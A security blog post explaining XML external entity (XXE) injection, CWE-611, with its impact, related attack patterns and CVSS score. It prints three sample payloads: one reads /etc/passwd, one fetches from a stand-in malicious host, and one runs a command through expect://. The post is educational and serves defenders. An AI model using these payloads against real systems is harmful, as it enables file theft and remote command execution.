Open in app

Sign in

Write

Sign in

Improper Restriction of XML External Entity Reference (‘XXE’) [CWE-611] — The Hacktivists

The Hacktivists
2 min readMar 13, 2021

Improper Restriction of XML External Entity Reference or XXE describes the case where XML parser is not correctly configured and allows the attacker to directly interact with local or external files.

Table of Content
1. Description
2. Potential impact
3. Attack patterns
4. Affected software
5. Severity and CVSS Scoring

1. Description
………………………………

The weakness is caused by an error while parsing an XML file that contains XML entities with URIs that can resolve to documents outside the intended location. If the application fails to check the path to documents before including them, the attacker is able to include an arbitrary file from a local or remote system and trigger the application to display it.

The XXE attack is constructed around XML language capabilities to define arbitrary entities using the external Data Type Definition (DTD) and the ability to read or execute files.

Below is an example of the XML file that when processed may return the output of the local “/etc/passwd” file:

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE test [
        <!ELEMENT test ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

Another example shows how to request an external resource using the same vulnerability:

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE test [
        <!ELEMENT test ANY >
        <!ENTITY xxe SYSTEM "http://www.malicious-website.com/xxe.txt >]>

The attacker can also be able to execute arbitrary commands on the system by leveraging third-party software, e.g. “expect” PHP module. The PoC code below will list files and directories in the current application folder by running the “/bin/ls” command:

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE test [ <!ELEMENT test ANY >
        <!ENTITY xxe SYSTEM "expect://ls" >]>

2. Potential impact
………………………………

XXE is a very dangerous vulnerability. Depending on application implementation and the application environment the impact may vary from local/remote file inclusion to remote command execution and full system compromise.

This vulnerability can be used also to perform port scans of the vulnerable system or servers located in the internal network.

3. Attack patterns
………………………………

This vulnerability is associated with the following attack patterns:

❏ CAPEC-201: XML Entity Blowup
❏ CAPEC-221: XML External Entities
❏ CAPEC-231: XML Oversized Payloads

4. Affected software
………………………………

Software that processes XML files can be affected by this issue.

5. Severity and CVSS Scoring
……………………………………..

This is an extremely dangerous vulnerability. It may allow an attacker to compromise a vulnerable system as is most likely scored as Critical:
9.8[CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C] — Critical

Credits: https://www.immuniweb.com/

Xml External Entities
Xxe
Web Service Attacks
Penetration Testing
The Hacktivists

--

--

The Hacktivists

Written by The Hacktivists

41 Followers

Contact us for Information Security Services & Training https://thehacktivists.in/

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams